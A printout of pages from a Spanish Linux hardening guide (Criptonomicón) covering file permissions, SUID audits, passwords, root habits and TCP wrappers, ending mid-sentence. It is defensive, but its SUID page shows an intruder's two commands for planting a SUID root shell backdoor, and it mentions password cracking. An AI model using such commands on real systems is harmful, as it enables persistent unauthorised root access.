Configure la mscara de creacin de ficheros para que sea lo ms restrictiva


posible. Son habituales 022, 033, y la ms restictiva 077, y aadirla a
/etc/profile.
El comando umask se puede usar para determinar el modo de creacin de
ficheros por defecto en su sistema. Es el complemento octal a los modos de
fichero deseado. Si los ficheros se crean sin ningn miramiento de estado de
permisos, el usuario, de forma inadvertida, podr asignar permisos de lectura o
file:///C|/TEMP/criptonomicon/criptonomicon/linux/normasfich.html (1 of 4) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Introduccin

escritura a alguien que no debera tenerlos. De forma tpica, el estado de


umask incluye 022, 027 y 077, que es lo ms restrictivo. Normalmente umask
se pone en /etc/profile y por tanto se aplica a todos los usuarios del sistema.
Por ejemplo, puede tener una lnea parecida a la siguiente:
# Pone el valor por defecto de umask del
usuario
umask 033
Est seguro de que el valor umask de root es 077, lo cual desactiva los
permisos de lectura, escritura y ejecucin para otros usuarios, salvo que
explcitamente use chmod(1).

Si est usando , y utiliza su esquema de creacin de idetificador de grupos y


usuarios (User Private Groups), slo es necesario usar 002 para umask. Esto
se debe a que al crear un usuario se crea un grupo exclusivo para ese usuario.
Limitar recursos
Ponga el lmites al sistema de ficheros en lugar de 'ilimitado' como est por
defecto. Puede controlar el lmite por usuario utilizando el mdulo PAM de
lmite de recursos y /etc/pam.d/limits.conf. Por ejemplo, los lmites para un
grupo `users' podra parecer a esto:
@users hard core 0
@users hard nproc 50
@users hard rss 5000

Esto dice que se prohiba la creacin de ficheros core, restringe el nmero de


procesos a 50, y restringe el uso de memoria por usuario a 5M.
wtmp, utmp

Los ficheros /var/log/wtmp y /var/run/utmp contienen los registros


de conexin de todos los usuarios de su sistema. Se debe mantener su
integridad, ya que determinan cundo y desde dnde entr en su sistema un
usuario o un potencial intruso. Los ficheros deberan tener los permisos 644,
sin afectar a la normal operacin del sistema.
Sticky bit

El sticky bit se puede usar para prevenir borrados accidentales o proteger


un fichero para sobreescritura. Tambin previene que alguien cree enlaces
simblicos a un fichero, que ha sido el origen de ataques basados en el borrado
de los ficheros /etc/passwd o /etc/shadow. Vea la pgina del manual
de chattr(1) para tener ms informacin.
SUID y SGID
Los ficheros SUID y SGID de su sistema son potenciales riesgos de seguridad
y deberan ser controlados. Como estos programas garantizan privilegios
especiales al usuario que los ejecuta, es necesario estar seguro que no hay

file:///C|/TEMP/criptonomicon/criptonomicon/linux/normasfich.html (2 of 4) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Introduccin

instalados programas inseguros. Un truco favorito de los crackers es explotar


programas con el bit SUID, y entonces dejar un programa SUID como puerta
trasera para entrar la prxima vez, incluso aunque el agujero original ya est
tapado.
Encuentre todos los programas SUID/SGID de su sistema y mantener la pista
de lo que son, para que est prevenido de cualquier cambio que podra indicar
un potencial intruso. Use el siguiente comando para localizar todos los
progrmas SUID/SGID en su sistema:
root# find / -type f \( -perm -04000 -o
-perm -02000 \)
Incluso podra crear una base de datos de progrmas SUID con
root# find / -type f \( -perm -04000 -o
-perm -02000 \)>/var/suid
y posteriormente verificar si ha aparecido alguno nuevo con el siguiente guin:
for fich in `find / -type f \( -perm -04000
-o -perm -02000 \)`
do
if ! grep $fich /var/suid
then
echo "$fich es un nuevo fichero con SUID"
fi
done
echo "Actualiza la base de datos si es
necesario"

Puede eliminar los permisos SUID o SGIG de un programa con chmod(1), y


siempre puede devolverlo a su estado original si piensa que es absolutamente
necesario.
Permisos de escritura
Los ficheros con permiso de escritura global, particularmente los del sistema,
pueden ser un agujero de seguridad si un cracker obtiene acceso a su sistema y
los modifica. Adems, los directorios con permiso de escritura global son
peligrosos, ya que permiten a un cracker aadir y borrar los ficheros que
quiera. Para localizar los ficheros con permiso de escritura global, use el
siguiente comando:
root# find / -perm -2 -print

y est seguro de saber por qu tienen esos permisos de escritura. En el curso


normal de una operacin los ficheros tendrn permisos de escritura, incluidos
algunos de /dev y enlaces simblicos.
Ficheros extraos

file:///C|/TEMP/criptonomicon/criptonomicon/linux/normasfich.html (3 of 4) [25/10/2000 02:34:31 p.m.]

Seguridad del Sistema de Archivos - Introduccin

Los ficheros sin propietario tambin pueden ser un indicio de que un intruso ha
accedido a su sistema. Puede localizar los ficheros de su sistema que no tienen
propietario o que no pertenecen a un grupo con el comando:

root# find / -nouser -o -nogroup -print


Ficheros peligrosos
La localizacin de ficheros .rhosts debera ser uno de los deberes regulares
de la administracin de su sistema, ya que estos ficheros no se deberan
permitir en sus sistema. Recuerde que un cracker slo necesita una cuenta
insegura para potencialmente obtener acceso a toda su red. Puede localizar
todos los ficheros .rhosts de su sistema con el siguiente comando:

root# find /home -name .rhosts -print


Permisos
Finalmente, antes de cambiar permisos en cualquier sistema de ficheros, est
seguro de que entiende lo que hace. Nunca cambie permisos de un fichero
simplemente porque parezca la forma fcil de hacer que algo funcione.
Siempre debe determinar porqu el fichero tiene esos permisos y propietario
antes de modificarlos.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/normasfich.html (4 of 4) [25/10/2000 02:34:31 p.m.]

Seguridad local - Desbordamiento de bfer (buffer overflow)

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de

Desbordamiento de bfer (buffer


overflow)

Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root

Habris oido en muchas ocasiones hablar de agujeros de seguridad


relacionados con los desbordamientos de bferes (buffer
overflow). Es un trmino que se repite muy a menudo, ya que los
desbordamientos de bfer constituyen una fuente frecuente de
resquicios de seguridad, desde los muy graves, como el infame
Gusano de Internet de 1988, hasta los que difcilmente pueden ser
explotados provechosamente por ningn hacker.

Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID

Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Si bien para comprenderlos hace falta un conocimiento


Seguridad del root
considerable de programacin en ensamblador y en C y sobre la
arquitectura de la mquina sobre la que ocurre, la idea del desbordamiento de bfer
se puede expresar muy sencillamente de la siguiente forma:
Un bfer se desborda cuando intentamos meter en l ms cosas de las que caben en el
espacio que tena reservado.
Veamos un caso real de programacin en C en que se produce un desbordamiento tal:
void func(void)
{
int i;
char buffer[256];
for (i=0;i<512;i++)
buffer[i]='A';
}
Hemos reservado 256 caracteres, pero luego queremos escribir en ese espacio 512,
producindose el desbordamiento. A partir de ah se origina una situacin de
excepcin, el programa probablemente se quedar colgado, y un hacker experto
podra explotar esta inestabilidad para conseguir que el sistema ejecute su propio
cdigo.
De aqu en adelante, los detalles son excesivamente crpticos, pero podis encontrar

file:///C|/TEMP/criptonomicon/criptonomicon/linux/bufferoverflow.html (1 of 2) [25/10/2000 02:34:32 p.m.]

Seguridad local - Desbordamiento de bfer (buffer overflow)

una descripcin sobresaliente en el siguiente documento en ingls:


The Tao of Windows Buffer Overflow
escrito por DilDog. Advertimos que es droga dura, slo apto para programadores
empedernidos y de muy alto nivel.
Nota: La funcin de ejemplo est tomada de dicho documento.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/bufferoverflow.html (2 of 2) [25/10/2000 02:34:32 p.m.]

Seguridad local - Cuentas de usuario, grupos

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de

Cuentas de usuario, grupos


Cada usuario del sistema est definido por una lnea en el fichero
/etc/passwd y cada grupo por otra lnea en el fichero
/etc/group. Cada usuario pertenece a uno o varios grupos y
cada recurso pertenece a un usuario y un grupo. Los permisos para
un recurso se pueden asignar al propietario, al grupo y a otros
(resto de los usuarios). Ahora bien, para mantener un sistema
seguro, pero funcional, tendremos que realizar las combinaciones
necesarias entre el propietario y grupo de un recurso con los
permisos de los propietarios, grupos y otros. Por ejemplo, la
unidad de disco flexible tiene las siguientes caractersticas:

Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root

brw-rw-r-- 1 root floppy 2,0 may 5 1998 /dev/fd0

Ruptura?

Recursos

Propietario: root con permiso de lectura y escritura.


Grupo: floppy con permiso de lectura y escritura.
Otros: resto de los usuario con permiso de lectura.

Cuando queramos que un usuario pueda escribir en la unidad de disco, slo


tendremos que incluirlo en el grupo floppy. Cualquier otro usuario que no pertenezca
al grupo floppy (salvo root) slo podr leer el disquete.
El administrador tiene que conocer las necesidades de cada uno de sus usuarios y
asignarle los mnimos privilegios para que pueda realizar su trabajo sin resultar un
peligro para otros usuarios o el sistema. Ms abajo veremos otro mecanismo para
poder utilizar un recurso sobre el cual no tenemos privilegios.
No se asuste. Los valores que traen por defecto las distribuciones de Linux son
suficiente para mantener el sistema seguro.
Otro peligro potencial para el sistema es mantener cuentas abiertas que se han dejado
de utilizar. Estas cuentas pueden constituir un buen refugio para un potencial
atacante y pasar desapercibidas sus acciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/cuentas.html (1 of 2) [25/10/2000 02:34:32 p.m.]

Seguridad local - Cuentas de usuario, grupos

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/cuentas.html (2 of 2) [25/10/2000 02:34:32 p.m.]

Seguridad local - Seguridad de las claves

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad de las claves


La seguridad de una sola cuenta puede comprometer la seguridad
de todo el sistema. Esto es una realidad ante la que debemos
protegernos.

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Por un lado tenemos que asegurarnos de que nuestros usuarios


utilizan claves slidas:
No deben ser una palabra conocida.
Deberan contener letras, nmeros y caracteres especiales.
Deben ser fciles de recordar y difciles de adivinar.

Introduccin
Cuentas de usuario,
grupos
Seguridad de las
claves
El bit SUID/SGID
Seguridad del root

Para comprobar que este requisito se verifica en nuestro sistema, podemos usar los
mismos mecanismos que utilizan los atacantes. Existen varios programas que van
probando varias palabras de diccionario, claves habituales y combinaciones de
caracteres, que son cifrados con el mismo algoritmo que usa el sistema para mantener
sus claves; despus son comparadas con el valor de la clave cifrada que quermos
averiguar hasta que el valor obtenido de un cifrado coincide con una clave cifrada.
Posteriormente notificaremos al usuario que su clave es dbil y le solicitaremos que
la modifique.
Usando este mecanismo, al menos podemos garantizar que no estaremos en
inferioridad de condiciones con respecto a los atacantes locales.
Un conocido programa para realizar el descifrado de claves es John the Ripper.
Por otro lado, las claves cifradas se almacenan en el fichero /etc/passwd.
Cualquier usuario del sistema tiene permiso de lectura sobre este fichero. Lo que es
peor, agujeros en los navegadores permiten que se puedan leer ficheros arbitrarios de
una mquina (evidentemente, que el usuario de navegador tenga permiso para leer),
de manera que lleguen hasta un hacker que cree pginas web que exploten estos
agujeros. No te pierdas una demostracin para Netscape 4.5. Entonces puede parecer
a primera vista que nos encontramos con un grave agujero de seguridad. El atacante,
una vez obtenido el fichero /etc/passwd no tiene ms que ejecutar su programa
revientaclaves favorito y sentarse a esperar hasta que empiecen a aparecer nombres
de usuario con sus respectivas contraseas, algo que suele pasar muy rpidamente.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/claves.html (1 of 3) [25/10/2000 02:34:32 p.m.]

Seguridad local - Seguridad de las claves

Con suerte, si el administrador es ingenuo o dejado, incluso dar con la clave del
root, abrindosele as las puertas a la mquina objetivo. Para solucionar esta
vulnerabilidad, podemos recurrir a contraseas en la sombra (shadow passwords), un
mecanismo consistente en extraer las claves cifradas del fichero /etc/passwd y
situarlas en otro fichero llamado /etc/shadow, que slo puede leer el root y dejar
el resto de la informacin en el original /etc/passwd. El fichero /etc/shadow
slo contiene el nombre de usuario y su clave, e informacin administrativa, como
cundo expira la cuenta, etc. El formato del fichero /etc/shadow es similar al
siguiente:
usuario : clave : ultimo : puede : debe : aviso : expira
: desactiva : reservado

usuario: El nombre del usario.


clave: La clave cifrada
ultimo: Das transcurridos del ltimo cambio de clave desde el da 1/1/70
puede: Das transcurridos antes de que la clave se pueda modificar.
tiene: Das transcurridos antes de que la clave tenga que ser modificada.
aviso: Dias de aviso al usuario antes de que expire la clave.
expira: Das que se desactiva la cuenta tras expirar la clave.
desactiva: Das de duracin de la cuenta desde el 1/1/70.
reservado: sin comentarios.

Un ejemplo podra ser:


julia : gEvm4sbKnGRlg : 10627 : 0 :
: 134529868

99999 : 7 : -1 : -1

El paquete de Shadow Passwords se puede descargar desde cualquiera de los


siguientes sitios, con instrucciones para su instalacin:
ftp://i17linuxb.ists.pwr.wroc.pl/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.icm.edu.pl/pub/Linux/shadow/shadow-current.tar.gz
ftp://iguana.hut.fi/pub/linux/shadow/shadow-current.tar.gz
ftp://ftp.cin.net/usr/ggallag/shadow/shadow-current.tar.gz
ftp://ftp.netural.com/pub/linux/shadow/shadow-current.tar.gz
Para activar contraseas en la sombra, tiene que ejecutar pwconv como root; accin
que crear su fichero /etc/shadow. Si su distribucin de Linux no incluye
contraseas en la sombra o encuentra alguna dificultad para incorporar esta
caracterstica, existe un documento HOWTO (CMO) titulado
Shadow-Password-HOWTO que le puede resultar de gran utilidad. Aqu podr
encontrar tambin informacin adcional que le puede ayudar a mantener su seguridad
local. Hasta ahora hemos visto diversas situaciones en las que podemos aumentar la
seguridad usando una clave. Piense que tiene que recordar cada una de las claves que
utiliza, piense que NO debe anotar NUNCA su clave en un papel (y menos pegarla a

file:///C|/TEMP/criptonomicon/criptonomicon/linux/claves.html (2 of 3) [25/10/2000 02:34:32 p.m.]

Seguridad local - Seguridad de las claves

la pantalla). En alguna situacin olvidar una clave puede ser un serio problema.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/claves.html (3 of 3) [25/10/2000 02:34:32 p.m.]

Seguridad local - El bit SUID/SGID

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de

El bit SUID/SGID

Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la

En muchas ocasiones un proceso necesita ejecutarse con unos


privilegios mayores (o menores) que el usuario que lo lanz. Por
ejemplo, un usuario puede modificar su propia clave con el
mandato passwd, pero esto implica modificar el fichero
/etc/passwd, y para esto un usuario "de a pie" no tiene
permiso. Cmo se soluciona? Pues activando el bit SUID del
comando passwd (ntese que cuando esto sucede, la x de
ejecutable pasa a ser una s):

Seguridad
Qu hacer en caso de

Introduccin
Cuentas de usuario,
grupos
Seguridad de las claves
El bit SUID/SGID
Seguridad del root

ls -la /usr/bin/passw*

Ruptura?

-r-sr-xr-x 1 root bin 15613 abr 27 1998 /usr/bin/passwd

Recursos

Esto quiere decir que cuando se ejecute, el proceso correspondiente va a tener los
privilegios del propietario del comando (es decir, el root), no del usuario que lo
lanz. En otras palabras, el proceso generado por passwd pertenece a root. A
primera vista, esto puede parecer una seria brecha de seguridad. Y lo es. Si el
programa funciona correctamente, no tiene por qu dar problemas; pero pequeos
defectos en el programa pueden ser utilizados por alguien para tratar de ejecutar otro
cdigo distinto con los privilegios de este proceso. El mtodo suele ser el
desbordamiento de la pila (buffer overflow).
Cualquier atacante que haya entrado en un sistema de forma ilegtima intentar dejar
una shell con el bit SUID para mantener ese nivel de privilegio cuando vuelva a
entrar en el sistema.
SGID es lo mismo que SUID, pero aplicado al grupo.
As pues, tenga cuidado con los programas con el bit SUID/SGIG. Puede
encontrarlos con
root# find / -type f \( -perm -04000 -o -perm -02000 \)
-print

file:///C|/TEMP/criptonomicon/criptonomicon/linux/suid.html (1 of 2) [25/10/2000 02:34:33 p.m.]

Seguridad local - El bit SUID/SGID

Tenga en cuenta que algunos programas (como passwd) tienen que tener el bit
SUID. Compruebe en los lugares habituales, (que indicamos en la seccin
correspondiente) que ninguno de los programas propiedad del root o SUID que
utiliza en su sistema, tiene un fallo de seguridad conocido que pueda ser explotado.
Nunca debe permitir que quede una shell SUID corriendo en el sistema. Si el root
deja desatendida la consola durante unos instantes (recuerde, debe utilizar siempre
xlock), un intruso podra escribir lo siguiente:
# cp /bin/sh /tmp/cuenta-root
# chmod 4755 /tmp/cuenta-root
crendose una versin SUID de la shell sh. En el futuro, cuando el atacante ejecute
ese programa, cuenta-root, se convertir en root! Si lo escondiera en un
directorio oculto, la nica forma de encontrarlo sera escaneando el sistema completo
como se ha explicado antes.
Y recuerde, nuca escriba guiones de shell SUID.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/suid.html (2 of 2) [25/10/2000 02:34:33 p.m.]

Seguridad local - Seguridad del root

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Seguridad del root


Introduccin
Los peores destrozos de un sistema es probable que no vengan de
ningn cracker, o de un malvolo intruso. En muchsimas ms
Cuentas de usuario,
ocasiones ha sido el propio administrador el que ha destrozado el
grupos
sistema. S, el root. Por qu? Por descuido, por exceso de
confianza, por ignorancia. Evitar este problema no es difcil.
Seguridad de las claves
Siguiendo unas fciles normas, podr protegerse de Vd. mismo:
El bit SUID/SGID
No use la cuenta de root por norma. Evtela. Intente
primero cualquier accin como un usuario normal, y si ve
Seguridad del root
que no tiene permiso, piense porqu y use el comando su si
es necesario.
Ejecute los comandos de forma segura verificando previamente la accin que
va a realizar. Por ejemplo si quiere ejecutar rm borrar.*, ejecute primero
ls borrar.* y si es lo que pretende modifique el mandato y ejectelo.
Ciertos mandatos admiten una opcin (-i) para actuar de forma interactiva.
Actvela, si no lo est ya aadiendo estas lneas a su fichero de recursos par la
shell:
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'

Siempre puede evitar estas preguntas, a veces incordiosas, con el mandato


yes, cuando est seguro de la operacin que est realizando:
$ yes s|rm borrar.*

Como ya deben saber, el directorio actual no est, por defecto, en la ruta de


bsqueda de ejecutables (PATH). Esto garantiza que no lanzaremos, sin
darnos cuenta, un ejecutable que est en el directorio actual llamado, por
ejemplo ls.
Evite que la clave del root viaje por una red sin cifrar. Utilice ssh u otro canal
seguro.
Limite los terminales desde los que se puede conectar root. Es preferible

file:///C|/TEMP/criptonomicon/criptonomicon/linux/segroot.html (1 of 2) [25/10/2000 02:34:33 p.m.]

Seguridad local - Seguridad del root

limitarlo a la consola del sistema. Esto se puede decidir en


/etc/securetty. Si necesita una sesin remota como root, entre como
usuario normal y luego use su.
Acte de forma lenta y meditada cuando sea root. Sus acciones podran afectar
a un montn de cosas. Pinselo antes de teclear!

Hay herramientas como sudo que permiten a ciertos usuarios utilizar comandos
privilegiados sin necesidad de ser root, como montar o desmontar dispositivos.
Adems registra las actividades que se realizan, lo que ayuda a determinar qu hace
realmente este usuario.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/segroot.html (2 of 2) [25/10/2000 02:34:33 p.m.]

Seguridad del root - Hbitos seguros

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

Hbitos seguros
La seguridad del administrador es simple, en mayor medida
consiste en tener unos hbitos seguros y tambin en utilizar
herramientas seguras.

Introduccin
Hbitos seguros

Consejos
Una primera norma que siempre debera tener presente es usar la
cuenta de root slo para realizar tareas concretas y breves y el resto hacerlo como
usuario normal. Es una costumbre muy peligrosa usar todo el tiempo la cuenta de
root. Al principio, a los usuarios de Linux les gusta sentir todo el poder de la cuenta
de root, les molesta que su propio sistema les deniegue el permiso para hacer algo,
pero van cambiando de opinin poco a poco, conforme se van familiarizando con el
sistema o cuando han realizado un destrozo de esos que nos hacen proferir insultos
contra nosotros mismos acompaados de un desesperado puetazo en la mesa (o en
el teclado). Piense que cuando el sistema le deniega alguna operacin es porque
puede conllevar algn riesgo. El sistema le avisa para que piense dos veces lo que
est haciendo.

En los casos de tareas que necesiten privilegios de administrador para realizar una
operacin concreta, podemos usar la orden su (Super Usuario) o tambin sudo.
De esta forma podremos acceder a los privilegios de root slo cuando nos interese.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/habitossegroot.html [25/10/2000 02:34:34 p.m.]

Seguridad del root - Consejos

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Consejos

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de

Ruptura?

Recursos

Introduccin
Asegrese de que en los borrados de ficheros por parte del
root se pide confirmacin. Esto lo puede hacer poniendo
Hbitos seguros
alias rm="rm -i". Esto es lo habitual para el root. Si en
alguna ocasin tiene que borrar muchos ficheros y no quiere
Consejos
confirmar cada uno de ellos, puede usar la opcin -f para
no pedir confirmacin, deshacer el alias con alias rm=rm o bien usando la
orden yes, poniendo yes|rm ficheros para ir confirmando automticamente
cada una de las preguntas de la orden.
Procure prever los resultados de una orden, sobre todo si usa comodines,
intentndolo antes una forma no irreversible. Por ejemplo, si quiere borrar
todos los ficheros terminados en ~ ejecute primero ls -la *~ y una vez que
haya verificado a qu va a afectar la orden, ejecute rm *~.
Vigile la variable de entorno PATH. Limite la bsqueda automtica de
ejecutables a las ubicaciones estndar del sistema. De forma particular evite
incluir el directorio actual, es decir ., en esta bsqueda. Bastara incluir un
ejecutable llamado ls en un directorio para que usted mismo ejecute un
cdigo desconocido con privilegios de root, y cuando se d cuenta de lo que ha
hecho sea demasiado tarde.

Adems, no tenga directorios con permiso de escritura en su ruta de


bsquedas, ya que esto puede permitir a un posible atacante modificar o poner
nuevos binarios que se puedan ejecutar como root la prxima vez que ejecute
una determinada orden.
No utilice las herramientas rlogin/rsh/rexec como root. Pueden ser objeto de
diversos tipos de ataques y es peligroso ejecutarlas como root. Nunca cree un
fichero .rhosts para root.
Evite que la clave del root circule por la red sin cifrar. Si tiene la necesidad de
ofrecer servicios de shell o ejecucin remotas sobre un canal inseguro utilice

file:///C|/TEMP/criptonomicon/criptonomicon/linux/consejosroot.html (1 of 2) [25/10/2000 02:34:34 p.m.]

Seguridad del root - Consejos

ssh en lugar de telnet u otra herramienta que no cifre los datos de las
conexiones. Los servicios remotos como rlogin, rsh y rexec, como
dijimos antes, no suelen ser seguros si se utilizan canales no seguros. Es mejor
deshabilitarlos.
Limite las ubicaciones desde donde alguien se puede conectar como root al
sistema. En el fichero /etc/securetty puede especificar la lista de terminales
desde las cuales se puede conectar el root. Las teminales predeterminadas para
conectarse como root slo incluyen las consolas virtuales (vtys). Si tuviera que
conectarse como root desde una ubicacin distinta a la consola, hgalo como
usuario normal primero y luego utilice su para acceder a los privilegios de
root. De esta forma un posible atacante tendra que conocer el nombre de un
usuario del sistema, conocer su clave y tambin conocer la clave del root. Esto
pone ms dificultades para obtener privilegios remotos en su sistema.
Evite siempre dar la clave de root, no lo haga bajo ningn concepto por mucha
confianza que tenga con esa persona. Si tiene que otorgar privilegios a algn
usuario para realizar alguna tarea de administracin, como montar un CD u
otro dispositivo similar, utilice sudo para permitirlo con la propia clave del
usuario. As puede decidir qu usuario tiene acceso a una determinada orden.
No modifique los permisos de un fichero o directorio si no sabe realmente qu
est haciendo. Los valores que trae la instalacin de las distintas distribuciones
suelen ser adecuados.
Jams, insistimos, jams se conecte a un servicio IRC como usuario root.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/consejosroot.html (2 of 2) [25/10/2000 02:34:34 p.m.]

Seguridad de Red - inetd

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de

inetd
Para atender las solicitudes de conexin que llegan a nuestro
equipo existe un demonio llamado inetd que est a la escucha de
todos los intentos de conexin que se realicen a su mquina.
Cuando le llega una solicitud de conexin ir dirigida a un puerto
(nmero de servicio, quizs sea ms claro que puerto), por
ejemplo, el 80 sera una solicitud al servidor de pginas web, 23
para telnet, 25 para smtp, etc. Los servicios de red que presta su
mquina estn descritos en /etc/inetd.conf (y en
/etc/services los nmeros de puertos). Por ejemplo, en
/etc/inetd.conf podemos encontrar las siguientes lneas:

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales

(...)
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
# imap stream tcp nowait root /usr/sbin/tcpd imapd
(...)

Ruptura?

Recursos

Esto quiere decir que, cuando llegue una solicitud de conexin al puerto 110 (pop3)
se ejecutar el programa /usr/sbin/tcpd ipop3d. Sin embargo, el servicio
imap est deshabilitado (est comentado con un # delante), por lo que el sistema no
le responde.

Copyright 1997-1999 Gonzalo lvarez Maran y Pedro Pablo Fbrega Martnez. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/inetd.html [25/10/2000 02:34:35 p.m.]

Seguridad de Red - TCP Wrapper

Introduccin

Seguridad Fsica

Seguridad Local
Seguridad del Sistema de
Archivos

Seguridad del Ncleo

Seguridad de Red

Seguridad del Root


Preparacin para la
Seguridad
Qu hacer en caso de
Ruptura?

Recursos

TCP Wrapper
El siguiente paso es /usr/sbin/tcpd, que es el tcp_wrapper:
un servicio que verifica el origen de las conexiones con su base de
datos /etc/hosts.allow (equipos autorizados) y
/etc/hosts.deny (equipos a los que se les deniega la
conexin). tcpd anota todos los intentos de conexin que le llegan
en /var/log/secure para que tenga la posibilidad de saber
quin intenta conectarse a su mquina y si lo consigue. Si tcpd
autoriza la conexin, ejecuta ipop3d que es el programa que
realmente atiende la conexin, ante el cual se tiene que validar el
usuario mediante una clave. Observe que ya llevamos tres niveles
de seguridad: prestar un servicio, autorizar un conexin y validar
un usuario.

Introduccin
inetd
tcp wrapper
Incidencias
Comunicaciones
seguras
Consejos finales

Un consejo que es conveniente seguir: No tenga abiertos los servicios que no


necesita; esto supone asumir un riesgo a cambio de nada. Tampoco limite la
funcionalidad del sistema, si tiene que usar un servicio, hgalo sabiendo lo que hace.
Tambin hay que asegurarse de que el programa ipop3d no tenga ninguna
vulnerablidad, es decir, que est actualizado. Existen numerosos medios para estar al
da de las vulnerabilidades que aparecen. Una buena lista de correo o una revista
electrnica tal vez sean la forma ms rpida de conocer los incidentes, las causas y
las soluciones. Posiblemente la mejor lista de correo para el mundo Unix sea Bugtraq
(busque en forums).
Pero esto no es todo, adems puede filtrar las conexiones que le lleguen desde el
exterior para que ni siquiera alcancen a los tcp_wrappers. Por ejemplo, en el caso de
conexiones a Internet por mdem:
